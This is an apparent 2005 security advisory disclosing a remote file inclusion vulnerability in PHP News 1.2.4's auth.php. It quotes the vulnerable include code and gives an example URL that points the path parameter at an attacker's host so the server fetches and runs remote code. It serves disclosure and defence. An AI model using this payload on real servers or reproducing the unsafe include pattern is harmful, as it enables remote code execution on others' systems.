PHP News <= 1.2.4 - Remote File Inclusion (VXSfx)
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: PHP News
Version: 1.2.4 (and possibly 1.2.3)
Homepage: http://newsphp.sourceforge.net/
Author: Filip Groszynski (VXSfx)
Date: 23 February 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Vulnerable code in auth.php:
if (is_Array($userDetails)) {
...
}
/* You're about to log in/no user language is specified */
else if(file_exists($path . 'languages/' . $lang . '.admin.lng')) {
include_once($path . 'languages/' . $lang . '.admin.lng');
....
} else {
include_once($path . 'languages/en_GB.admin.lng');
....
}
--------------------------------------------------------
Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/auth.php?path=http://[hacker_box]/
--------------------------------------------------------
Fix and Vendor status:
Vendor has been notified, expect an official patch tomorrow.
--------------------------------------------------------
Contact:
Author: Filip Groszynski (VXSfx)
Location: Poland <Warsaw>
Email: groszynskif <at> gmail <dot> com
HP: http://shell.homeunix.org
-- == -- == -- == -- == -- == -- == -- == -- == -- == --